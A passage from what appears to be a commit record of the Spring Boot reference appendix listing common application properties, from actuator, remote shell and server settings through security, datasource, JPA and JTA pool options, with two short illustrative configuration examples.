cluster\n\tmanagement.health.diskspace.enabled=true\n\tmanagement.health.diskspace.path=.\n\tmanagement.health.diskspace.threshold=10485760\n\tmanagement.health.jms.enabled=true\n\tmanagement.health.mail.enabled=true\n\tmanagement.health.mongo.enabled=true\n\tmanagement.health.rabbit.enabled=true\n\tmanagement.health.redis.enabled=true\n\tmanagement.health.solr.enabled=true\n\tmanagement.health.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP\n\n\t# MVC ONLY ENDPOINTS\n\tendpoints.jolokia.path=\/jolokia\n\tendpoints.jolokia.sensitive=true\n\tendpoints.jolokia.enabled=true # when using Jolokia\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.enabled=true # enable JMX export of all endpoints\n\tendpoints.jmx.domain= # the JMX domain, defaults to 'org.springboot'\n\tendpoints.jmx.unique-names=false\n\tendpoints.jmx.static-names=\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# REMOTE SHELL\n\tshell.auth=simple # jaas, key, simple, spring\n\tshell.command-refresh-interval=-1\n\tshell.command-path-patterns= # classpath*:\/commands\/**, classpath*:\/crash\/commands\/**\n\tshell.config-path-patterns= # classpath*:\/crash\/*\n\tshell.disabled-commands=jpa*,jdbc*,jndi* # comma-separated list of commands to disable\n\tshell.disabled-plugins=false # don't expose plugins\n\tshell.ssh.enabled= # ssh settings ...\n\tshell.ssh.key-path=\n\tshell.ssh.port=\n\tshell.telnet.enabled= # telnet settings ...\n\tshell.telnet.port=\n\tshell.auth.jaas.domain= # authentication settings ...\n\tshell.auth.key.path=\n\tshell.auth.simple.user.name=\n\tshell.auth.simple.user.password=\n\tshell.auth.spring.roles=\n\n\t# METRICS EXPORT ({sc-spring-boot-actuator}\/metrics\/export\/MetricExportProperties.{sc-ext}[MetricExportProperties])\n\tspring.metrics.export.enabled=true # flag to disable all metric exports (assuming any MetricWriters are available)\n\tspring.metrics.export.delay-millis=5000 # delay in milliseconds between export ticks\n\tspring.metrics.export.send-latest=true # flag to switch off any available optimizations based on not exporting unchanged metric values\n\tspring.metrics.export.includes= # list of patterns for metric names to include\n\tspring.metrics.export.excludes= # list of patterns for metric names to exclude.
Applied after the includes\n\tspring.metrics.export.redis.prefix=spring.metrics # prefix for redis repository if active\n\tspring.metrics.export.redis.key=keys.spring.metrics # key for redis repository export (if active)\n\tspring.metrics.export.triggers.*= # specific trigger properties per MetricWriter bean name\n\n\t# SENDGRID ({sc-spring-boot-autoconfigure}\/sendgrid\/SendGridAutoConfiguration.{sc-ext}[SendGridAutoConfiguration])\n\tspring.sendgrid.username= # SendGrid account username\n\tspring.sendgrid.password= # SendGrid account password\n\tspring.sendgrid.proxy.host= # SendGrid proxy host\n\tspring.sendgrid.proxy.port= # SendGrid proxy port\n\n\t# GIT INFO\n\tspring.git.properties= # resource ref to generated git info properties file\n----\n","old_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. 
^^^\n\t# ===================================================================\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n # BANNER\n banner.charset=UTF-8 # banner file encoding\n banner.location=classpath:banner.txt # banner file location\n\n\t# SPRING CONFIG ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.name= # config file name (default to 'application')\n\tspring.config.location= # location of config file\n\n\t# PROFILES\n\tspring.profiles.active= # comma list of <<howto-set-active-spring-profiles,active profiles>>\n\tspring.profiles.include= # unconditionally activate the specified comma separated profiles\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.sources= # sources (class name, package name or XML resource location) to include\n\tspring.main.web-environment= # detect by default\n\tspring.main.show-banner=true\n\tspring.main....= # see class for all properties\n\n\t# ADMIN ({sc-spring-boot-autoconfigure}\/admin\/SpringApplicationAdminJmxAutoConfiguration.{sc-ext}[SpringApplicationAdminJmxAutoConfiguration])\n\tspring.application.admin.enabled=false # enable admin features for the application\n\tspring.application.admin.jmx-name=org.springframework.boot:type=Admin,name=SpringApplication # JMX name of the application admin MBean\n\n\t# OUTPUT\n\tspring.output.ansi.enabled=detect # Configure the ANSI output (\"detect\", \"always\", \"never\")\n\n\t# LOGGING\n\tlogging.path=\/var\/log\n\tlogging.file=myapp.log\n\tlogging.config= # location of config file (default classpath:logback.xml for logback)\n\tlogging.level.*= # levels for loggers, e.g. \"logging.level.org.springframework=DEBUG\" (TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF)\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.compression.enabled=false # if response compression is enabled\n\tserver.compression.mime-types=text\/html,text\/xml,text\/plain,text\/css # comma-separated list of MIME types that should be compressed\n\tserver.compression.min-response-size=2048 # minimum response size that is required for compression to be performed\n\tserver.context-parameters.*= # Servlet context init parameters, e.g. 
server.context-parameters.a=alpha\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.display-name= # the display name of the application\n\tserver.session.timeout= # session timeout in seconds\n\tserver.session.tracking-modes= # tracking modes (one or more of \"cookie\" ,\"url\", \"ssl\")\n\tserver.session.cookie.name= # session cookie name\n\tserver.session.cookie.domain= # domain for the session cookie\n\tserver.session.cookie.path= # path of the session cookie\n\tserver.session.cookie.comment= # comment for the session cookie\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie\n\tserver.session.cookie.max-age= # maximum age of the session cookie in seconds\n\tserver.ssl.enabled=true # if SSL support is enabled\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.ciphers= # supported SSL ciphers\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.protocol-header-https-value=https # value of the protocol header that indicates that the incoming request uses SSL\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30; # in seconds\n\tserver.tomcat.max-http-header-size= # maximum size in bytes of the HTTP message header\n\tserver.tomcat.max-threads = 0 # number of threads in protocol handler\n\tserver.tomcat.uri-encoding = UTF-8 # character encoding to use for URL decoding\n\tserver.undertow.access-log-enabled=false # if access logging is enabled\n\tserver.undertow.access-log-pattern=common # log pattern of the access log\n\tserver.undertow.access-log-dir=logs # access logs directory\n\tserver.undertow.buffer-size= # size of each buffer in bytes\n server.undertow.buffers-per-region= # number of buffer per region\n server.undertow.direct-buffers=false # allocate buffers outside the Java heap\n server.undertow.io-threads= # number of I\/O threads to create for the worker\n server.undertow.worker-threads= # number of worker threads\n\n\t# SPRING MVC 
({sc-spring-boot-autoconfigure}\/web\/WebMvcProperties.{sc-ext}[WebMvcProperties])\n\tspring.mvc.locale= # set fixed locale, e.g. en_UK\n\tspring.mvc.date-format= # set fixed date format, e.g. dd\/MM\/yyyy\n\tspring.mvc.favicon.enabled=true\n\tspring.mvc.message-codes-resolver-format= # PREFIX_ERROR_CODE \/ POSTFIX_ERROR_CODE\n\tspring.mvc.ignore-default-model-on-redirect=true # if the the content of the \"default\" model should be ignored redirects\n\tspring.mvc.async.request-timeout= # async request timeout in milliseconds\n\tspring.mvc.view.prefix= # MVC view prefix\n\tspring.mvc.view.suffix= # ... and suffix\n\n\t# SPRING RESOURCES HANDLING ({sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[ResourceProperties])\n\tspring.resources.cache-period= # cache timeouts in headers sent to browser\n\tspring.resources.add-mappings=true # if default mappings should be added\n\tspring.resources.static-locations= # comma-separated list of the locations that serve static content (e.g. 'classpath:\/resources\/')\n\tspring.resources.chain.enabled=false # enable the Spring Resource Handling chain (enabled automatically if at least a strategy is enabled)\n\tspring.resources.chain.cache=false # enable in-memory caching of resource resolution\n\tspring.resources.chain.html-application-cache=false # enable HTML5 appcache manifest rewriting\n\tspring.resources.chain.strategy.content.enabled=false # enable a content version strategy\n\tspring.resources.chain.strategy.content.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.enabled=false # enable a fixed version strategy\n\tspring.resources.chain.strategy.fixed.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.version= # version string to use for this version strategy\n\n\t# MULTIPART ({sc-spring-boot-autoconfigure}\/web\/MultipartProperties.{sc-ext}[MultipartProperties])\n\tmultipart.enabled=true\n\tmultipart.file-size-threshold=0 # Threshold after which files will be written to disk.\n\tmultipart.location= # Intermediate location of uploaded files.\n\tmultipart.max-file-size=1Mb # Max file size.\n\tmultipart.max-request-size=10Mb # Max request size.\n\n\t# SPRING HATEOAS ({sc-spring-boot-autoconfigure}\/hateoas\/HateoasProperties.{sc-ext}[HateoasProperties])\n\tspring.hateoas.apply-to-primary-object-mapper=true # if the primary mapper should also be configured\n\n\t# HTTP encoding ({sc-spring-boot-autoconfigure}\/web\/HttpEncodingProperties.{sc-ext}[HttpEncodingProperties])\n\tspring.http.encoding.charset=UTF-8 # the encoding of HTTP requests\/responses\n\tspring.http.encoding.enabled=true # enable http encoding support\n\tspring.http.encoding.force=true # force the configured encoding\n\n\t# HTTP message conversion\n\tspring.http.converters.preferred-json-mapper= # the preferred JSON mapper to use for HTTP message conversion. Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.\n\n\t# JACKSON ({sc-spring-boot-autoconfigure}\/jackson\/JacksonProperties.{sc-ext}[JacksonProperties])\n\tspring.jackson.date-format= # Date format string (e.g. yyyy-MM-dd HH:mm:ss), or a fully-qualified date format class name (e.g. com.fasterxml.jackson.databind.util.ISO8601DateFormat)\n\tspring.jackson.property-naming-strategy= # One of the constants on Jackson's PropertyNamingStrategy (e.g. 
CAMEL_CASE_TO_LOWER_CASE_WITH_UNDERSCORES) or the fully-qualified class name of a PropertyNamingStrategy subclass\n\tspring.jackson.deserialization.*= # see Jackson's DeserializationFeature\n\tspring.jackson.generator.*= # see Jackson's JsonGenerator.Feature\n\tspring.jackson.joda-date-time-format= # Joda date time format string\n\tspring.jackson.mapper.*= # see Jackson's MapperFeature\n\tspring.jackson.parser.*= # see Jackson's JsonParser.Feature\n\tspring.jackson.serialization.*= # see Jackson's SerializationFeature\n\tspring.jackson.serialization-inclusion= # Controls the inclusion of properties during serialization (see Jackson's JsonInclude.Include)\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.check-template-location=true\n\tspring.thymeleaf.prefix=classpath:\/templates\/\n\tspring.thymeleaf.excluded-view-names= # comma-separated list of view names that should be excluded from resolution\n\tspring.thymeleaf.view-names= # comma-separated list of view names that can be resolved\n\tspring.thymeleaf.suffix=.html\n\tspring.thymeleaf.mode=HTML5\n\tspring.thymeleaf.enabled=true # enable MVC view resolution\n\tspring.thymeleaf.encoding=UTF-8\n\tspring.thymeleaf.content-type=text\/html # ;charset=<encoding> is added\n\tspring.thymeleaf.cache=true # set to false for hot refresh\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false\n\tspring.freemarker.cache=true\n\tspring.freemarker.check-template-location=true\n\tspring.freemarker.charset=UTF-8\n\tspring.freemarker.content-type=text\/html\n\tspring.freemarker.enabled=true # enable MVC view resolution\n\tspring.freemarker.expose-request-attributes=false\n\tspring.freemarker.expose-session-attributes=false\n\tspring.freemarker.expose-spring-macro-helpers=false\n\tspring.freemarker.prefix=\n\tspring.freemarker.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.freemarker.request-context-attribute=\n\tspring.freemarker.settings.*=\n\tspring.freemarker.suffix=.ftl\n\tspring.freemarker.template-loader-path=classpath:\/templates\/ # comma-separated list\n\tspring.freemarker.view-names= # whitelist of view names that can be resolved\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.cache=true\n\tspring.groovy.template.charset=UTF-8\n\tspring.groovy.template.check-template-location=true # check that the templates location exists\n\tspring.groovy.template.configuration.*= # See GroovyMarkupConfigurer\n\tspring.groovy.template.content-type=text\/html\n\tspring.groovy.template.enabled=true # enable MVC view resolution\n\tspring.groovy.template.prefix=\n\tspring.groovy.template.resource-loader-path=classpath:\/templates\/\n spring.groovy.template.suffix=.tpl\n\tspring.groovy.template.view-names= # whitelist of view names that can be resolved\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false\n\tspring.velocity.cache=true\n\tspring.velocity.check-template-location=true\n\tspring.velocity.charset=UTF-8\n\tspring.velocity.content-type=text\/html\n\tspring.velocity.date-tool-attribute=\n\tspring.velocity.enabled=true # enable MVC view 
resolution\n\tspring.velocity.expose-request-attributes=false\n\tspring.velocity.expose-session-attributes=false\n\tspring.velocity.expose-spring-macro-helpers=false\n\tspring.velocity.number-tool-attribute=\n\tspring.velocity.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.velocity.prefix=\n\tspring.velocity.properties.*=\n\tspring.velocity.request-context-attribute=\n\tspring.velocity.resource-loader-path=classpath:\/templates\/\n\tspring.velocity.suffix=.vm\n\tspring.velocity.toolbox-config-location= # velocity Toolbox config location, for example "\/WEB-INF\/toolbox.xml"\n\tspring.velocity.view-names= # whitelist of view names that can be resolved\n\n\t# MUSTACHE TEMPLATES ({sc-spring-boot-autoconfigure}\/mustache\/MustacheAutoConfiguration.{sc-ext}[MustacheAutoConfiguration])\n\tspring.mustache.cache=true\n\tspring.mustache.charset=UTF-8\n\tspring.mustache.check-template-location=true\n\tspring.mustache.content-type=text\/html\n\tspring.mustache.enabled=true # enable MVC view resolution\n\tspring.mustache.prefix=\n\tspring.mustache.suffix=.html\n\tspring.mustache.view-names= # whitelist of view names that can be resolved\n\n\t# JERSEY ({sc-spring-boot-autoconfigure}\/jersey\/JerseyProperties.{sc-ext}[JerseyProperties])\n\tspring.jersey.type=servlet # servlet or filter\n\tspring.jersey.init= # init params\n\tspring.jersey.filter.order=\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages\n\tspring.messages.cache-seconds=-1\n\tspring.messages.encoding=UTF-8\n\n\t[[common-application-properties-security]]\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.user.name=user # login username\n\tsecurity.user.password= # login password\n\tsecurity.user.role=USER # role assigned to the user\n\tsecurity.require-ssl=false # advanced settings ...\n\tsecurity.enable-csrf=false\n\tsecurity.basic.enabled=true\n\tsecurity.basic.realm=Spring\n\tsecurity.basic.path= # \/**\n\tsecurity.basic.authorize-mode= # ROLE, AUTHENTICATED, NONE\n\tsecurity.filter-order=0\n\tsecurity.headers.xss=false\n\tsecurity.headers.cache=false\n\tsecurity.headers.frame=false\n\tsecurity.headers.content-type=false\n\tsecurity.headers.hsts=all # none \/ domain \/ all\n\tsecurity.sessions=stateless # always \/ never \/ if_required \/ stateless\n\tsecurity.ignored= # Comma-separated list of paths to exclude from the default secured paths\n\n\t# SECURITY OAUTH2 CLIENT ({sc-spring-boot-autoconfigure}\/security\/oauth2\/OAuth2ClientProperties.{sc-ext}[OAuth2ClientProperties])\n\tsecurity.oauth2.client.client-id= # OAuth2 client id\n\tsecurity.oauth2.client.client-secret= # OAuth2 client secret. A random secret is generated by default\n\n\t# SECURITY OAUTH2 SSO ({sc-spring-boot-autoconfigure}\/security\/oauth2\/client\/OAuth2SsoProperties.{sc-ext}[OAuth2SsoProperties])\n\tsecurity.oauth2.sso.filter-order= # Filter order to apply if not providing an explicit WebSecurityConfigurerAdapter\n\tsecurity.oauth2.sso.login-path= # Path to the login page, i.e. the one that triggers the redirect to the OAuth2 Authorization Server
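# ---- Example (illustrative; not part of the original listing) ----
# A minimal sketch of basic auth with a fixed user and a few unsecured
# static paths, using only the security.* keys above; the user name,
# password and paths are placeholders.
security.user.name=admin
security.user.password=secret
security.user.role=USER
security.basic.enabled=true
security.ignored=\/css\/**,\/js\/**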
\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.name= # name of the data source\n\tspring.datasource.initialize=true # populate using data.sql\n\tspring.datasource.schema= # a schema (DDL) script resource reference\n\tspring.datasource.data= # a data (DML) script resource reference\n\tspring.datasource.sql-script-encoding= # a charset for reading SQL scripts\n\tspring.datasource.platform= # the platform to use in the schema resource (schema-${platform}.sql)\n\tspring.datasource.continue-on-error=false # continue even if the database can't be initialized\n\tspring.datasource.separator=; # statement separator in SQL initialization scripts\n\tspring.datasource.driver-class-name= # JDBC Settings...\n\tspring.datasource.url=\n\tspring.datasource.username=\n\tspring.datasource.password=\n\tspring.datasource.jndi-name= # For JNDI lookup (class, url, username & password are ignored when set)\n\tspring.datasource.max-active=100 # Advanced configuration...\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n\tspring.datasource.initial-size=10\n\tspring.datasource.validation-query=\n\tspring.datasource.test-on-borrow=false\n\tspring.datasource.test-on-return=false\n\tspring.datasource.test-while-idle=\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.max-wait=\n\tspring.datasource.jmx-enabled=false # Export JMX MBeans (if supported)\n\n\t# DAO ({sc-spring-boot-autoconfigure}\/dao\/PersistenceExceptionTranslationAutoConfiguration.{sc-ext}[PersistenceExceptionTranslationAutoConfiguration])\n\tspring.dao.exceptiontranslation.enabled=true\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.host= # the db host\n\tspring.data.mongodb.port=27017 # the connection port (defaults to 27017)\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # connection URL\n\tspring.data.mongodb.database=\n\tspring.data.mongodb.authentication-database=\n\tspring.data.mongodb.grid-fs-database=\n\tspring.data.mongodb.username=\n\tspring.data.mongodb.password=\n\tspring.data.mongodb.repositories.enabled=true # if spring data repository support is enabled\n\tspring.data.mongodb.field-naming-strategy= # fully qualified name of the FieldNamingStrategy to use\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.jpa.properties.*= # properties to set on the JPA connection\n\tspring.jpa.open-in-view=true\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=\n\tspring.jpa.database=\n\tspring.jpa.generate-ddl=false # ignored by Hibernate, might be useful for other vendors\n\tspring.jpa.hibernate.naming-strategy= # naming classname\n\tspring.jpa.hibernate.ddl-auto= # defaults to create-drop for embedded dbs\n\tspring.data.jpa.repositories.enabled=true # if spring data repository support is enabled\n\n\t# JTA ({sc-spring-boot-autoconfigure}\/transaction\/jta\/JtaAutoConfiguration.{sc-ext}[JtaAutoConfiguration])\n\tspring.jta.log-dir= # transaction log dir\n\tspring.jta.*= # technology specific configuration
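# ---- Example (illustrative; not part of the original listing) ----
# A minimal sketch wiring the DataSource and JPA keys above for MySQL,
# assuming the MySQL driver is on the classpath; the URL and credentials
# are placeholders.
spring.datasource.url=jdbc:mysql:\/\/localhost:3306\/test
spring.datasource.username=dbuser
spring.datasource.password=dbpass
spring.datasource.driver-class-name=com.mysql.jdbc.Driver
spring.jpa.hibernate.ddl-auto=validate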
\n\n\t# JOOQ ({sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration])\n\tspring.jooq.sql-dialect=\n\n\t# ATOMIKOS\n\tspring.jta.atomikos.connectionfactory.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.connectionfactory.ignore-session-transacted-flag=true # Whether or not to ignore the transacted flag when creating a session\n\tspring.jta.atomikos.connectionfactory.local-transaction-mode=false # Whether or not local transactions are desired\n\tspring.jta.atomikos.connectionfactory.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.connectionfactory.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.connectionfactory.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.connectionfactory.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.unique-resource-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.datasource.default-isolation-level= # Default isolation level of connections provided by the pool\n\tspring.jta.atomikos.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.atomikos.datasource.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.datasource.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.datasource.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.datasource.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 
0 denotes no limit.\n\tspring.jta.atomikos.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource # The unique name used to identify the resource during recovery\n\n\t# BITRONIX\n\tspring.jta.bitronix.connectionfactory.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.connectionfactory.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.connectionfactory.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.connectionfactory.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.connectionfactory.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.connectionfactory.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.connectionfactory.cache-producers-consumers=true # Whether or not producers and consumers should be cached\n\tspring.jta.bitronix.connectionfactory.defer-connection-release=true # Whether or not the provider can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.connectionfactory.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.connectionfactory.max-pool-size=10 # The maximum size of the pool. 
0 denotes no limit\n\tspring.jta.bitronix.connectionfactory.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.connectionfactory.password= # The password to use to connect to the JMS provider\n\tspring.jta.bitronix.connectionfactory.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.connectionfactory.test-connections=true # Whether or not connections should be tested when acquired from the pool\n\tspring.jta.bitronix.connectionfactory.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.connectionfactory.unique-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.connectionfactory.use-tm-join=true # Whether or not TMJOIN should be used when starting XAResources\n\tspring.jta.bitronix.connectionfactory.user= # The user to use to connect to the JMS provider\n\tspring.jta.bitronix.datasource.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.datasource.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.datasource.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.datasource.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.datasource.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.datasource.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.datasource.cursor-holdability= # The default cursor holdability for connections\n\tspring.jta.bitronix.datasource.defer-connection-release=true # Whether or not the database can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.datasource.enable-jdbc4-connection-test= # Whether or not Connection.isValid() is called when acquiring a connection from the pool\n\tspring.jta.bitronix.datasource.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.datasource.isolation-level= # The default isolation level for connections\n\tspring.jta.bitronix.datasource.local-auto-commit= # The default auto-commit mode for local transactions\n\tspring.jta.bitronix.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.bitronix.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.datasource.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit\n\tspring.jta.bitronix.datasource.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.datasource.prepared-statement-cache-size=0 # The target size of the prepared statement cache. 
